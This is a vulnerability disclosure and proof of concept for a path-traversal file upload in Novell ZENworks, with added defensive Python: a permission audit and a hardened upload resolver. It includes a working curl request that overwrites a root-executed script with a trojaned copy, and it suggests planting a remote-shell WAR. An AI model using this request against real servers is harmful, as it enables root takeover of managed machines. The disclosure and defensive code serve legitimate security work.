PoC for vulnerability discovered by Stephen Fewer (www.harmonysecurity.com)
http://www.zerodayinitiative.com/advisories/ZDI-10-078/
You can overwrite any file owned by the zenworks user (nearly all of /opt/novell),
such as /opt/novell/zenworks/bin/daemon-monitor, a shell script
executed by the Novell ZENworks Daemon Monitor (/etc/init.d/novell-zenmntr) and
"of course" running as root…
$ ls -l /opt/novell/zenworks/bin/daemon-monitor
-rw-rw-r-- 1 zenworks zenworks 554 XXXX-YY-ZZ 69:69 /opt/novell/zenworks/bin/daemon-monitor
$ cat /opt/novell/zenworks/bin/daemon-monitor
SERVICES=`awk -F= '{ if ($1 == "services") print $2}' /etc/opt/novell/zenworks/monitor.conf`
SLEEPTIME=`awk -F= '{ if ($1 == "sleep") print $2}' /etc/opt/novell/zenworks/monitor.conf`
echo $SERVICES
echo $SLEEPTIME
if [ -z "$SERVICES" ]; then
echo "No services defined in /etc/opt/novell/zenworks/monitor.conf"
exit 1
fi
if [ -z "$SLEEPTIME" ]; then
SLEEPTIME=10
fi
while [ 1 ]; do
sleep $SLEEPTIME
for SRV in $SERVICES; do
/etc/init.d/$SRV status >/dev/null 2>&1 || /etc/init.d/$SRV start
( date ; id ) >> /tmp/monitor.log 2>&1
done
done
$
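The listing above is the whole problem in one line: a file owned by an unprivileged service account, group-writable, executed by a root init script. The following is an added audit check, not part of the original advisory: it walks a file that a root daemon executes and every directory between it and an assumed trust boundary, flagging anything not owned by the trusted uid or writable by group or others. The temporary install tree it builds is constructed for the demo and mirrors the -rw-rw-r-- zenworks:zenworks entry above.

```python
"""Audit a file that a root-run service executes.

It must be owned by the trusted uid and not be writable by group or others,
and so must every directory between it and the trust boundary: a writable
directory lets the file be renamed away and replaced even when the file
itself is locked down. The install tree below is constructed for the demo.
"""
import os
import stat
import tempfile


def audit_root_executed_file(path, trusted_uid=0, stop_at="/"):
    """Return a list of findings for `path`; an empty list means it is safe
    for a root daemon to execute. Ancestors are checked up to (excluding)
    `stop_at`, the directory assumed to be root-owned and locked down."""
    findings = []
    boundary = os.path.realpath(stop_at)
    current = os.path.realpath(path)
    while current != boundary:
        st = os.lstat(current)
        if st.st_uid != trusted_uid:
            findings.append(f"{current}: owned by uid {st.st_uid}, expected {trusted_uid}")
        if st.st_mode & stat.S_IWGRP:
            findings.append(f"{current}: group-writable")
        if st.st_mode & stat.S_IWOTH:
            findings.append(f"{current}: world-writable")
        parent = os.path.dirname(current)
        if parent == current:  # reached the filesystem root
            break
        current = parent
    return findings


def demo():
    """Build a constructed copy of the layout from the listing and audit it.
    Returns (findings_for_weak_copy, findings_for_hardened_copy)."""
    prefix = tempfile.mkdtemp(prefix="zenworks-demo-")   # stands in for /opt/novell/zenworks
    bindir = os.path.join(prefix, "bin")
    os.mkdir(bindir)
    os.chmod(bindir, 0o755)          # explicit, so the umask cannot loosen it
    script = "#!/bin/sh\necho monitor\n"

    weak = os.path.join(bindir, "daemon-monitor")
    with open(weak, "w") as fh:
        fh.write(script)
    os.chmod(weak, 0o664)            # -rw-rw-r--, as in the advisory's ls output

    hardened = os.path.join(bindir, "daemon-monitor.hardened")
    with open(hardened, "w") as fh:
        fh.write(script)
    os.chmod(hardened, 0o755)        # owner-writable only

    # In production trusted_uid is 0 (root). The sandbox cannot chown to root,
    # so the demo treats the current user as the trusted owner.
    me = os.getuid()
    return (audit_root_executed_file(weak, trusted_uid=me, stop_at=prefix),
            audit_root_executed_file(hardened, trusted_uid=me, stop_at=prefix))


if __name__ == "__main__":
    weak_findings, hardened_findings = demo()
    print("weak copy:    ", weak_findings or "clean")
    print("hardened copy:", hardened_findings or "clean")
```

Run against a real host as root with `stop_at="/opt/novell"` (or wherever the package owner hands control to the vendor) and the default `trusted_uid=0`; every path an init script under /etc/init.d execs should come back with an empty list.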
You can replace /opt/novell/zenworks/bin/jsvc (Java Virtual Machine), upload
a new remoteshell.war to /opt/novell/zenworks/share/tomcat/webapps, or use your
imagination to take control of all machines configured in ZCM.
PoC: Upload your own daemon-monitor (./daemon-monitor.troyanizado):
$ curl -ivkl 'http://zcm.server/zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/bin/&filename=daemon-monitor&overwrite=true' \
  --data-binary @./daemon-monitor.troyanizado -H "Content-Type: application/octet-stream"
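The request works because the upload handler joins the client-supplied `type` and `filename` onto its storage directory and lets the `..` segments walk out of it. The following is an added example, not the ZENworks upload servlet (which the advisory does not show): the flawed join beside a hardened resolver that allow-lists each parameter and then checks the canonical path still lies under the upload root. The upload root and the exact parameter handling are assumptions for the demo; the payload is the one from the curl request above.

```python
"""Containment check for a client-controlled upload location.

vulnerable_target() reproduces the flaw the request above exploits;
hardened_target() is the fix. UPLOAD_ROOT and the way the two parameters
are mapped to a directory are assumptions, not taken from the advisory.
"""
import posixpath
import re

UPLOAD_ROOT = "/var/opt/novell/zenworks/uploads"   # assumed upload base directory

# RFC 6838 restricted-name characters for a MIME type/subtype; the first
# character must be alphanumeric, so "." and ".." can never pass.
MIME_PART = re.compile(r"[A-Za-z0-9][A-Za-z0-9!#$&^_.+-]{0,126}")
# Conservative file-name allow-list: no separators, cannot start with a dot.
FILE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,254}")

# The traversal payload from the advisory's request, split into its two parameters.
ATTACK_TYPE = "application/octet-stream/../../../../../../../opt/novell/zenworks/bin/"
ATTACK_NAME = "daemon-monitor"


def vulnerable_target(upload_type, filename):
    """The flawed pattern: trust both parameters and join them onto the root.
    normpath collapses the '..' segments, so the result lands outside UPLOAD_ROOT."""
    return posixpath.normpath(posixpath.join(UPLOAD_ROOT, upload_type, filename))


def hardened_target(upload_type, filename):
    """Resolve the target or raise ValueError. Two independent layers: a strict
    allow-list on each parameter, then a canonical-path containment check."""
    parts = upload_type.split("/")
    if len(parts) != 2 or not all(MIME_PART.fullmatch(p) for p in parts):
        raise ValueError(f"invalid content type: {upload_type!r}")
    if not FILE_NAME.fullmatch(filename):
        raise ValueError(f"invalid file name: {filename!r}")

    root = posixpath.normpath(UPLOAD_ROOT)
    candidate = posixpath.normpath(posixpath.join(root, parts[0], parts[1], filename))
    # Defence in depth: even if the allow-lists were loosened later, anything
    # that canonicalises to a path outside the root is refused.
    if posixpath.commonpath([root, candidate]) != root:
        raise ValueError(f"path escapes upload root: {candidate}")
    return candidate


def demo():
    """Run both resolvers on the advisory's payload and on a legitimate request."""
    results = {"vulnerable": vulnerable_target(ATTACK_TYPE, ATTACK_NAME)}
    try:
        results["hardened_attack"] = hardened_target(ATTACK_TYPE, ATTACK_NAME)
    except ValueError as exc:
        results["hardened_attack"] = f"rejected: {exc}"
    results["hardened_legit"] = hardened_target("application/octet-stream", ATTACK_NAME)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:16s} {value}")
```

The allow-list alone stops this payload; the containment check is kept because allow-lists tend to be relaxed over time, and a canonical-path comparison against the root fails closed no matter what the earlier validation lets through. The `overwrite=true` flag in the request is a separate concern (whether an existing file may be clobbered at all) and is not modelled here.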
--
Greetings from #linux, your friendly channel.